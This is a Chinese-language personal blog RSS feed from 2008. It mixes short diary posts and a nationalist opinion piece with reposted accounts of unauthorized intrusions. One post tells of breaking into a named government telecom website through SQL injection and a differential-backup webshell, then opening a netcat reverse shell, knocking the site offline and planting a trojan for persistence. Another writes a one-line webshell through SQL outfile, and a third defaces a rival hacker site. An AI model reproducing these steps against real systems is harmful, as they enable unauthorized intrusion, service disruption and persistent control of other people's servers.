<?xml version="1.0" encoding="gb2312"?>
<rss version="2.0">
<channel>
<title><![CDATA[小浩同学]]></title>
        <image>
        <title>http://hi.baidu.com</title>
        <link>http://hi.baidu.com</link>
        <url>http://img.baidu.com/img/logo-hi.gif</url>
        </image>
<description><![CDATA[人生不能CTRL+Z]]></description>
<link>http://hi.baidu.com/xh%5Fhook</link>
<language>zh-cn</language>
<generator>www.baidu.com</generator>
<ttl>5</ttl>


<item>
        <title><![CDATA[换换口味]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/864b70a48e386df09052ee41.html]]></link>
        <description><![CDATA[
		
		<p>换QZone了。。一直在写BLOG  换换口味咯</p>
<p><a href="http://user.qzone.qq.com/82602935">http://user.qzone.qq.com/82602935</a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/864b70a48e386df09052ee41.html#comment">查看评论</a>]]></description>
        <pubDate>2008-12-14  22:34</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/864b70a48e386df09052ee41.html</guid>
</item>

<item>
        <title><![CDATA[社会工程+老式提权艰难渗透某通信局]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/c62512a73c003d93d1435858.html]]></link>
        <description><![CDATA[
		
		<div class="tpc_content" >文章作者：落叶纷飞[J.L.S.T]<br>
信息来源：安全叶子技术小组[J.Leaves Security Team]（<a href="http://00day.cn/" target="_blank"><font color="#2b76b0">http://00day.cn</font></a>）<br>
<br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp; 昨天一上Q就接到一个任务，任务目的是对一个通信局网站做安全检测。因为检测的过程比较曲折，于是，我就决定把这个渗透的过程记录下来与大家分享！<br>
一打开网站，我发现站点的页面几乎全是静态的，如图1所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_04ed2515cb36869.jpg" border="0"> <br>
<br>
于是我就开始baidu hack了，在百度的搜索框中搜索&ldquo;site:gdca.gov.cn inurl:asp?&rdquo;，如图2所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_98d33d9f96debaa.jpg" border="0"> <br>
<br>
我找了很久，只找到了一个带参数的地址，但不存在注入漏洞。算了，先找到后台再说吧，在目标网站地址后面加上&ldquo;/admin&rdquo;。呵呵，很幸运地返回了管理员登陆页面，如图3所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_9dfef3e8fc609e2.jpg" border="0"> <br>
<br>
我用了几个常用的默认密码&ldquo;admin&rdquo;&ldquo;admin888&rdquo;&ldquo;123456&rdquo;等在管理后台进行登录，但很不幸，返回的全都是密码错误。然后我用万能密码&ldquo;'or'='or'&rdquo;尝试登录，结果返回了SQL错误信息，如图4所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_65847e09a9b46a3.jpg" border="0"> <br>
<br>
经常玩入侵的朋友都应该知道，这是MSSQL报错时返回的信息，看来后台登录页面存在注入漏洞！终于找到突破点了！本来想直接用万能密码直接进后台拿webshell的，但是试了N次都不行，还是注入它算了！于是我就用WSockExpert对其进行抓包，提取到的地址为&ldquo;<a href="http://www.gdca.gov.cn/admin/main.asp?pwd=asd&amp;submit=%C8%B7++%B6%A8&amp;username=aa" target="_blank"><font color="#2b76b0">http://www.gdca.gov.cn/admin/main.asp?pwd=asd&amp;submit=%C8%B7++%B6%A8&amp;username=aa</font></a>&rdquo;，发包的类型为post，把这个地址放在阿D-SQL注入工具里进行注入检测，居然提示没有注入漏洞！晕，经过一轮测试，发现只有NBSI和穿山甲pangolin能对这个注入点进行注入，原因是其他的注入工具没有自定义发包类型的功能，所以对于post类型的注入点它们就傻眼了。用NBSI检测得到注入点的权限为DB_OWNER，如图5所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_1b5d3a84fca637f.jpg" border="0"> <br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp; 呵呵，应该很快能拿下了！用NBSI的列目录得到网站的根目录为&ldquo;d:\gdca\&rdquo;，思路立刻就有了，使用以下差异备份语句就可以获得一个shell了：<br>
1、';alter database GDCA_Wa set RECOVERY FULL--<br>
2、';create table cmd (a image)--<br>
3、';backup log GDCA_Wa to disk = 'c:\cmd' with init--<br>
4、';insert into cmd (a) values (0x3c002500650078006500630075007400650020007200650071007500650073007400280022006c002200290025003e00)--<br>
5、';backup log GDCA_Wa to disk = 'd:\gdca\343434.asp'--<br>
6、';drop table cmd--<br>
&nbsp;&nbsp;&nbsp;&nbsp; &ldquo;0x3c002500650078006500630075007400650020007200650071007500650073007400280022006c002200290025003e00&rdquo;这段16进制的字符串的原文是&ldquo;&lt;%execute request(&quot;l&quot;)%&gt;&rdquo;，结果没有备份成功。然后我又用getwebshell 2.0进行log差异备份，但是发现根本不能备份成功，开始我还以为是管理员禁止了MSSQL的备份功能，后来仔细想了一下，可能是因为注入点的发包类型为post，而备份工具是用get的方式进行差异备份的。于是，我决定利用旁注找到别的网站的常规注入点再进行进一步的入侵，打开&ldquo;<a href="http://www.114best.com/ip/" target="_blank"><font color="#2b76b0">http://www.114best.com/ip/</font></a>&rdquo;，查询后发现目标的服务器仅有两个网站，如图6所示。<br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_1_8629cb08ad966e1.jpg" border="0"> <br>
<br>
打开&ldquo;<a href="http://www.gdis.cn/" target="_blank"><font color="#2b76b0">http://www.gdis.cn/</font></a>&rdquo;，居然很轻松的找到了后台和一个注入点，如图7所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_8fd5370aa6591f0.jpg" border="0"> <br>
<br>
后台不存在弱口令和注入漏洞，所以我再次操起getwebshell 2.0进行差异备份，备份出来后发现一句话竟然不能用，无论怎么变形都会显示图8的现象。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_3a957aa2250e8cb.jpg" border="0"> <br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp; 造成这种情况的原因有两个，一、管理员设置了MSSQL在备份数据库的时候过滤掉&ldquo;&lt;&rdquo;或&ldquo;&gt;&rdquo;；二、数据库中就存在类似于&ldquo;&lt;%notdown&rdquo;这样的防下载表。思路又一次中断了。<br>
&nbsp;&nbsp;&nbsp;&nbsp; 经过两分钟的思考，我决定想办法进入这两个网站中其中一个的后台拿shell。在猜解&ldquo;<a href="http://www.gdca.gov.cn/" target="_blank"><font color="#2b76b0">http://www.gdca.gov.cn/</font></a>&rdquo;的表的时候，注入工具竟然发生了意外，多次尝试都是同样的结果；用穿山甲pangolin得到&ldquo;<a href="http://www.gdis.cn/" target="_blank"><font color="#2b76b0">http://www.gdis.cn/</font></a>&rdquo;的后台管理员帐号和密码均为一个空格，而我在登录后台后却返回一片空白。4分钟后，我又想到了一个方法，就是想通过注入点来列出&ldquo;<a href="http://www.gdis.cn/" target="_blank"><font color="#2b76b0">http://www.gdis.cn/</font></a>&rdquo;的admin目录下的文件，看有没有上传文件的功能页，有的话就试试上传漏洞，因为我已经登录后台，session已经满足了，所以应该能使用后台管理功能的。但很遗憾，没有发现上传文件的功能页。<br>
唉，难道就这样放弃吗？这时，又一个点子产生了！思路就是通过列目录来查找前人入侵时留下的后门，呵呵。经过近1小时的查找，我终于在&ldquo;<a href="http://www.gdis.cn/" target="_blank"><font color="#2b76b0">http://www.gdis.cn/</font></a>&rdquo;的admin目录下发现一个可疑文件w.asp，打开后如图9所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_8f8e9fce6eccdd1.jpg" border="0"> <br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp; 呵呵，看来是前面的入侵者通过差异备份获得的一句话木马，OK现在我们只要猜出它的密码就能拿到一个webshell了！打开lake2的一句话木马连接端，用一些一句话木马常用的密码来一个个的试，但均以失败告终。<br>
思路中断了。神啊，怎么你要这样耍我啊？忽然，我脑里闪过一个念头，一般的人在获得了一句话木马后，应该会上传大马吧？而且大马很可能和一句话是同目录的！于是我又开始在admin目录查找可以的文件。功夫不忘有心人，一个叫ad.asp的文件居然是newmm小马！如图10所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_ce6c6f41819d035.jpg" border="0"> <br>
<br>
呵呵，这下就能拿到webshell了！但是很遗憾，无论写什么文件都提示失败，这时，我的心情彻底的掉下了谷底。喝了杯水，平复了一下心情后，继续作战！这回，终于给我发现到一个大马了，文件是add.asp，如图11所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_f5ec2c62d4c68b3.jpg" border="0"> <br>
<br>
但是我们怎么知道密码呢？一般的入侵者都会用自己的网名、QQ或邮箱前缀作为自己webshell的密码，而这个入侵者的网名有两个，一个是&ldquo;LcySun&rdquo;还有一个是&ldquo;冰冷的太阳&rdquo;，接下来，就要施展社会工程学的时候了！首先要获得这个入侵者的QQ和邮箱，而这个大马就有他的blog连接，我打开看了一下并没有什么有用的信息。那么就利用baidu hack来弄他的资料出来吧！打开<a href="http://www.baidu.com/" target="_blank"><font color="#2b76b0">www.baidu.com</font></a>，输入&ldquo;icysun 黑客&rdquo;，这里大家可能会问为什么要加&ldquo;黑客&rdquo;这个关键词，原因很简单，我们要的是他的资料，网上叫icysun的人可能很多（后来才知道我的一个朋友和他挺熟的，早知道就直接问密码了=&lt;），但接触网络安全的可能就他一个，所以我加上了&ldquo;黑客&rdquo;这个关键词。结果，我在一个贴吧里找到了他的信息，那是他入侵了一个网站后留下的信息，如图12所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_e30e4c8d7eabce2.jpg" border="0"> <br>
<br>
从那则信息得到这个叫icysun的入侵者的QQ是&ldquo;3600*****&rdquo;、邮箱是&ldquo;3600*****@vip.qq.com&rdquo;或&ldquo;<a href="mailto:icysun@vip.qq.com"><font color="#2b76b0">icysun@vip.qq.com</font></a>&rdquo;，于是我用&ldquo;3600*****&rdquo;和&ldquo;icysun&rdquo;作为密码登录，结果用&ldquo;icysun&rdquo;作为密码时登陆成功，如图13所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_4dacbe9c069eacb.jpg" border="0"> <br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp; 用别人的webshell总是不那么习惯，于是我就上传了一个自己写的webshell，用着就是舒服，呵呵！webshell的权限很大，开了3389终端服务但不支持外连，不能直接执行命令，但支持wscript，这就等于能执行命令啦！看来提权有望了！打开&ldquo;C:\Program Files&rdquo;目录，发现安装了Resin和JDK，难道支持jsp？如果支持jsp的话很可能可以直接执行系统命令哦！但当我上传了一个jsp webshell后，发现服务器并不支持jsp。jsp不行asp.net和php总该行吧？谁知服务器真的不支持php和asp.net，郁闷。<br>
&nbsp;&nbsp;&nbsp;&nbsp; 然后我又想利用SA来提权，如果能找到SA帐户的话，那么服务器应该就能拿下了！但我在整个服务器找了半天也没找到SA的帐号，然后我又想利用pcanywhere、Radmin之类的第三方软件来提权，但pcanywhere和Radmin都没有安装。但是再找了一会，在D盘发现了一个叫serv-u的文件夹，我尝试打开却提示没有权限，不管那么多了，直接提权试试吧！立即用goldsun的asp提权工具进行提权，但是提权不成功，我又用之前自己写的asp提权工具进行提权，结果同样是无功而返。扫描了一下端口，发现服务器打开了43958端口，但没有打开21端口，怪不得没能提权成功（但也不排除管理员改了密码！）。提权思路陷入困境！<br>
&nbsp;&nbsp;&nbsp;&nbsp; 还是先静一静心吧！然后我就到黑防论坛闲逛，这居然让我想起ms08025本地提权漏洞还没有试！马上找到黑防杂志的那个exp，尝试提权。可是很不幸的，提权不成功了，看来服务器修补了漏洞。<br>
整理了一下思路，不知道替换服务和写文件进&ldquo;开始--&gt;启动&rdquo;项目的提权方法行不行呢？不管了，试试再说吧！我配置了一个上兴4.7木马，在准备上传的时候才记起服务器是Win2003系统，win2003默认不能上传超过200K的文件，不过如果能修改&ldquo;c:\windows\system32\inesrv&rdquo;目录下的&ldquo;metaba se.xml&rdquo;文件的话，我们就可以上传大于200K的文件了，尝试打开&ldquo;c:\windows\system32\inesrv&rdquo;这个目录，居然成功进入了！于是我找到&ldquo;metaba se.xml&rdquo;这个文件，编辑它，然后找到&ldquo;ASPMaxRequestEntityAllowed&rdquo;这项，把默认的204800修改为20480000（即20M），结果保存成功！如图14所示。<br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_1_f0037081244cc59.jpg" border="0"> <br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp; 现在，只要IIS一重启，我们就可以上传大于200K的文件了！但是不可能要我傻傻的等待服务器重启吧？于是我就想到了用nc把服务器的80端口反弹来我的机器，这样的话，网站就不能正常浏览，管理员就很有可能会重启IIS了。马上上传了一个nc到&ldquo;c:\windows\system32&rdquo;目录，在服务器端输入&ldquo;c:\windows\system32\nc.exe -e 我的IP 2006&rdquo;，然后在本地用NC监听2006端口，命令为&ldquo;nc -vv -l -p 2006&rdquo;，不一会儿，我监听的2006端口就有回应了。尝试访问&ldquo;<a href="http://www.gdca.gov.cn/" target="_blank"><font color="#2b76b0">http://www.gdca.gov.cn/</font></a>&rdquo;，发现不能正常访问，现在就出去看看电视吧，只要看到本机的nc断了连接，就可以开始继续渗透了。<br>
经过几小时的等待，我本机的nc终于断连接了，马上登陆webshell，在&ldquo;C:\Documents and Settings\Administrator\「开始」菜单\程序\启动&rdquo;目录中上传了我的上兴，接下来的事情同样是等待。在等待的过程中，我突发奇想，管理员会不会不是重启IIS而是重启了整个服务器呢？于是使用systeminfo命令证实了我的猜测。如图15所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_fd37f1e97f93092.jpg" border="0"> <br>
<br>
&nbsp;&nbsp;&nbsp;&nbsp; 从图中可以看出，系统启动时间为0天3小时52分16秒，那么就意味着管理员是把整个服务器重启掉了，而不是单单重启IIS。嘿嘿，那我们就再来用NC反弹一次端口吧！重复一次反弹端口的步骤，然后我就约了几个朋友出去玩了。晚上回来的时候，我发现目标服务器成功上线！至此，整台服务器就拿下了。</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/c62512a73c003d93d1435858.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-24  19:55</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/c62512a73c003d93d1435858.html</guid>
</item>

<item>
        <title><![CDATA[phpcms后台拿webshell]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/7adfcc8279c83db96c8119fd.html]]></link>
        <description><![CDATA[
		
		<div class="tpc_content" >文章作者：co14[J.L.S.T] <br>
信息来源：安全叶子技术小组[J.Leaves Security Team](<a href="http://www.00day.cn/" target="_blank"><font color="#2b76b0">http://www.00day.cn</font></a>) <br>
<br>
phpcms后台拿webshell <br>
<br>
刚写了个利用工具,想试试拿个webshell玩,费了不少力气才进了个后台 <br>
环境:windows+IIS,root <br>
不熟悉这程序,小弟不才,一时还不知道怎么弄 <br>
周围看了下,可以执行sql,先试试能否load_file,因为注点里load出来得文件才看到那么一小段 <br>
先读c:\\windows\system32\\inetsrv\\metabase.xml试试 <br>
select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) <br>
结果,,,, <br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_55_c08d0b53dec6874.jpg" border="0"> <br>
<br>
没回显...晕乎, <br>
继续转转,发现了个环境变量 <br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_55_964e41ecc32f978.jpg" border="0"> <br>
<br>
得到物理路径 <br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_55_bc6b163a149c923.jpg" border="0"> <br>
<br>
回到sql执行,导出webshell: <br>
既然是IIS,直接用asp的一句话算了 <br>
select/**/'&lt;%eval request(&quot;sb&quot;)%&gt;'/**/into/**/outfile/**/'E:\\xxxx\\1x.asp'/* <br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_55_b34824469aca606.jpg" border="0"> <br>
<br>
访问 <br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_55_d2458904edf11b3.jpg" border="0"> <br>
<br>
..过程比较顺利,,RP大爆发的说 <br>
各位不要BS我,,,,</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/7adfcc8279c83db96c8119fd.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-23  01:20</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/7adfcc8279c83db96c8119fd.html</guid>
</item>

<item>
        <title><![CDATA[睡到现在]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/d2d4fd6e037ebbdc81cb4aa7.html]]></link>
        <description><![CDATA[
		
		朋友过生日....有个人很像很像  ....于是偶醉了 <img src="http://img.baidu.com/hi/jd/j_0005.gif"> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/d2d4fd6e037ebbdc81cb4aa7.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-19  20:42</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/d2d4fd6e037ebbdc81cb4aa7.html</guid>
</item>

<item>
        <title><![CDATA[韩剧害了中国女人，日本A片害了中国男人]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/5a12e07eb63db93e0cd7daa2.html]]></link>
        <description><![CDATA[
		
		<div class="tpc_content" >一个没有自信心、无论干什么都崇洋媚外的民族是最可悲的民族！ <br>
<br>
　　比如,现在许多80后女生特别的迷恋韩剧，那些极端完美、极端理想的爱情观念不知道害了多少纯真少女的心。它使人们生活在幻想里，不能自拔，不知道该怎么面对正常的生活。我们知道生活总是有挫折和缺憾的，至少目前中国的大环境是这样。但是韩剧给中国女人灌输的思想就是好的男人首先要帅、然后要有钱，这些还远远不够的，还要有责任心，要专一、要有爱心、当然更要事业有成、最好再有家庭背景，还要宠爱自己一辈子等等，这都是现实中极少出现的人物，女人们就在那里傻眼的等吧。还有日本的A片，现在的男人电脑里几乎都存放着一些日本A片，用于业余的调情。这也纯属正常，没有什么不妥，关键问题是日本的A片太夸大了，把某些东西描绘的美轮美奂的同时，又故意夸大男人的那方面能力。搞的中国男人太自卑了，甚至以为自己不正常，不够正常男人的标准。 <br>
<br>
　　首先，一个民族的文化是这个民族兴衰成败的最关键因素。中华民族,目前正处在复兴时期，能够正确、积极利用自身的文化传统显的非常迫切。先进的西方国家都有过无比崇拜东方文化的时期。当年，博大精深、高明神秘的东方文化，不知道折服了多少西方科学家，举一个例子，那个发明了解析几何学的西方科学家，曾经恳求康熙加入中国国籍，康熙问为什么，他回答：&ldquo;我看了中国的周易才知道，我耗费了一生精力才研究透彻的解析几何，想不到几千年前的中国人早就更加深刻的掌握其中内涵，而且我只是其中一个小小的分支。我恳求加入中国国籍！&rdquo;中国文化确实大有文章可做，然而，我们自己都没有完全利用和吸取到自家文化的精髓和内涵，从而产生巨大的力量。相反，一些旁门左道的外来文化的入侵却抽走许多国人的灵魂，变的麻木、无知。 <br>
<br>
　　我们需要在现实面前的乐观、进取。现实总是有遗憾的，生活本身就是个缺陷。完美也少不了缺陷，关键就看你以什么样的心态来面对。还有韩国、台湾的一些恶俗、低级的综艺节目，毫无思想和教育意义可言。一群傻鸟就在那里相互逗趣耍闹，那些节目简直就是：一群猴在耍，一群猪在看。而堂堂中华民族，泱泱大国，五千年文明史，文化源源流长，国民竟然用一些旁门左道的文化来充当精神粮食。还有国内的一些专门做给中学生看的杂志，文章风格全是韩流，灌输给我们的中学生都是些毫无用处的东西，使他们脱离现实轨道，对祖国和人民麻木，缺乏奋进精神，没有远大理想，并且促使他们早恋。真是可悲、可叹。究其原因，还是我们不够自信，崇洋媚外。 <br>
<br>
　　为什么许多国民非常迷恋外来文化？我认为,是中国那一百多年被屈辱和侵略的历史使中国人产生了一种自卑心理。并且一代代的往下延续，而现在，中国要想繁荣昌盛、要走向复兴，就一定要把这种自卑心理调整过来。尤其是奥运会成功的召开，国人应该感到骄傲，我们应当由此开始当树立自信、大国的心态。</div> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/5a12e07eb63db93e0cd7daa2.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-13  15:11</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/5a12e07eb63db93e0cd7daa2.html</guid>
</item>

<item>
        <title><![CDATA[iis6+asp.net 提权1Day]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/4b279ffc00ee5e84b801a066.html]]></link>
        <description><![CDATA[
		
		<p>提权IIS6_0DAY语音教程<a href="http://ipconfig.cc/IIS60_DAy.rar" target="_blank"><font color="#2b76b0">http://ipconfig.cc/IIS60_DAy.rar</font></a><br>
<br>
<br>
后来来安全叶子　才发现已经有Ｂin了．．　俺只想混点　y望</p>
<p><a href="http://00day.cn/forum/read.php?tid=874">http://00day.cn/forum/read.php?tid=874</a></p> 
		
		<br/><b>类别：</b><a href="http://hi.baidu.com/xh%5Fhook/blog/category/%C4%AC%C8%CF%B7%D6%C0%E0">默认分类</a>&nbsp;<a href="http://hi.baidu.com/xh%5Fhook/blog/item/4b279ffc00ee5e84b801a066.html#comment">查看评论</a>]]></description>
        <pubDate>2008-10-10  01:13</pubDate>
        <category><![CDATA[默认分类]]></category>
        <author><![CDATA[X14oH4o]]></author>
		<guid>http://hi.baidu.com/xh%5Fhook/blog/item/4b279ffc00ee5e84b801a066.html</guid>
</item>

<item>
        <title><![CDATA[入侵华东黑客联盟装X的过程]]></title>
        <link><![CDATA[http://hi.baidu.com/xh%5Fhook/blog/item/59ee26c60e1c1a1d9d163d98.html]]></link>
        <description><![CDATA[
		
		<div class="tpc_content" >文章作者：落叶纷飞[J.L.S.T] &amp; 云中鹰[J.L.S.T]<br>
信息来源：安全叶子技术小组[J.Leaves Security Team]（<a href="http://00day.cn/" target="_blank"><font color="#2b76b0">http://00day.cn</font></a>）<br>
<br>
<br>
有些朋友对我和云中鹰搞华东的过程比较感兴趣，其实那个很没技术含量<br>
<br>
今天闲着无聊，把手上的项目葛一下，来论坛放松一下，顺便说说上次搞华东黑客联盟到装B的过程<br>
<br>
这天云中鸡说华东的某人很牛X，利用JPG黑站大法把恶灵战队黑了，还发了个demo出来<br>
<br>
我去看了一下demo，感觉很黑客，于是就和云中鸡搞了一下华东<br>
<br>
首先，我记得华东只被人搞过一次（记性不好，原谅下~~），所以应该防护还是比较好的<br>
<br>
服务器应该防ARP，不过这还只是猜测<br>
<br>
云中鸡说先不搞C段，PZ一下再说<br>
<br>
然后我就打开了<a href="http://www.3hack.com/" target="_blank"><font color="#2b76b0">www.3hack.com</font></a><br>
<br>
一看，我晕，怎么网站变了................以前我比较喜欢到华东去看动画，现在怎么变成这鸟样了，晕..............<br>
<br>
这时候云中鸡丢了一个同F的站过来，说进了后台搞不了shell<br>
<br>
我看了下搞到了一个webshell出来（这里涉及点技巧，不过不是重点，故省略....），登上webshell后发现服务器的权限很BT<br>
<br>
然后我就把shell丢给云中鸡去提权，过了一会儿找到了一个二级玉米的站shop.xiahack.cn<br>
<br>
看着是用eshop来架设的网店，虽然不是同F，但还是想搞下他看有什么可利用的地方，用了几个0day去搞发现不是最新版，0day用不鸟<br>
<br>
问了下云中鸡提权怎样了，他说还在努力，装不鸟B就不睡觉，晕了，这下入侵陷入了僵局...............<br>
<br>
无聊到网上乱逛，这时无意中发现一个阿拉伯XXXXXX，具体就不说啥鸟，呵呵~~<br>
<br>
然后阿拉伯黑客发现了<a href="http://www.3hack.com/" target="_blank"><font color="#2b76b0">www.3hack.com</font></a>上有个xia的目录很可疑，于是我就去看看是什么<br>
<br>
打开一看，如图1所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_a8d665f343765b2.jpg" border="0"> <br>
<br>
我靠~~这啥东西？这么帅？点进去一看，如图2所示。<br>
<br>
<br>
<img alt="Click Here To EnLarge" src="http://00day.cn/forum/attachment/thumb/6_1_d741c5c7b6b8a48.jpg" border="0"> <br>
<br>
太帅了，真YD！！<br>
<br>
这个页面应该是一套个人主页程序，而且还挺炫的！<br>
<br>
这个页面有发表日志的地方，应该可能存在登陆页面，找了一轮后发现当鼠标放到网页顶端的时候就会弹出登陆页面，如图3所示。<br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_1_b03700cb2fe5d52.jpg" border="0"> <br>
<br>
嘿嘿，试着'or'='or'居然进去了！！如图4所示。<br>
<br>
<br>
<img src="http://00day.cn/forum/attachment/6_1_7107004af344a3c.jpg" border="0"> <br>
<br>
经过半个多小时的摸索，还是没有发现可利用的地方。<br>
<br>
这下郁闷了，不管了，把这套程序下载下来看看吧<br>
<br>
找了一会才知道这套程序叫做&ldquo;V时代个人flash主页&rdquo;<br>
<br>
到官方下了套最新版，然后找了一下可利用的地方，不一会，我发现&ldquo;/html/admin&rdquo;这个目录很可能可以利用<br>
<br>
于是马上打开<a href="http://www.3hack.com/xia/html/admin" target="_blank"><font color="#2b76b0">http://www.3hack.com/xia/html/admin</font></a><br>
<br>
返回的确实找不到页面，郁闷了，输入<a href="http://www.3hack.com/xia/html/" target="_blank"><font color="#2b76b0">http://www.3hack.com/xia/html/</font></a><br>
<br>
同样是找不到页面，真晕！再看看！<br>
<br>
5分钟过后，我发现后台地址是&ldquo;/asp&rdquo;，默认数据库是&ldquo;/asp/vshidai.mdb&rdquo;，嘿嘿！这下你不死定了！<br>
<br>
马上打开<a href="http://www.3hack.com/xia/asp/vshidai.mdb" target="_blank"><font color="#2b76b0">http://www.3hack.com/xia/asp/vshidai.mdb</font></a>，我晕！服务器居然设置了mdb后缀映射，下载不了！<br>
<br>
打开<a href="http://www.3hack.com/xia/asp/" target="_blank"><font color="#2b76b0">http://www.3hack.com/xia/asp/</font></a>，发现返回空白，这下我真是服了！<br>
<br>
希望快覆灭了，这时我点到了根目录下的send.asp文件，看到里面存在着一个有意思的东西，代码如下：<br>
<br>
<h6 class="quote"><a href=" :"><font color="#2b76b0">Copy code</font></a></h6>
<blockquote class="blockquote" >var a<br>
var b<br>
var tx<br>
var clean<br>
a=Request(&quot;re&quot;)<br>
clean=Request(&quot;clean&quot;)<br>
var jian=&quot;test.txt&quot;<br>
<br>
if(clean==1){<br>
tx=&quot;&amp;a=&quot;<br>
var fs2<br>
var fs2=Server.CreateObject(&quot;Scripting.FileSystemObject&quot;)<br>
var newdt=fs2.OpenTextFile(Server.MapPath(jian),2,true)<br>
newdt.WriteLine(&quot;&amp;a=&quot;)<br>
newdt.close()<br>
}<br>
<br>
if(clean==0|clean==1){<br>
tx=&quot;&quot;<br>
var fso = Server.Createobject(&quot;Scripting.FileSystemObject&quot;)<br>
var file = fso.OpenTextFile(Server.Mappath(jian))<br>
while (!file.AtEndOfStream){<br>
tx=file.ReadLine()<br>
Response.write (tx)<br>
}<br>
Response.write (&quot;&amp;&quot;)<br>
file.close()<br>
}<br>
<br>
if(clean==2){<br>
tx=&quot;&quot;<br>
var fso = Server.Createobject(&quot;Scripting.FileSystemObject&quot;)<br>
var file = fso.OpenTextFile(Server.Mappath(jian))<br>
<br>
var fs2<br>
var fs2=Server.CreateObject(&quot;Scripting.FileSystemObject&quot;)<br>
var newdt=fs2.OpenTextFile(Server.MapPath(jian),8,true)<br>
<br>
<br>
while (!file.AtEndOfStream){<br>
tx=file.ReadLine()<br>
Response.write (tx)}<br>
<br>
Response.write (a+&quot;&amp;&quot;)<br>
newdt.WriteLine(a)<br>
<br>
file.close()<br>
newdt.close()<br>
}<br>
</blockquote><br>
<br>
这下应该可以装B了！从代码看出，我们首先要提交&ldquo;send.asp?clean=1&rdquo;来创建一个名为test.txt的文件，文件里面写着&ldquo;&amp;a=&amp;&rdquo;<br>
<br>
接下来我们提交&ldquo;send.asp?clean=2&amp;re=H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过&rdquo;<br>
<br>
这样就能在test.txt文件里新建一行并写入&ldquo;H4cked by 落叶纷飞 and 云中鹰....00day.cn全体飘过&rdquo;这句话<br>
<br>
过程如图5、6所示。<br>
<br>
<br>
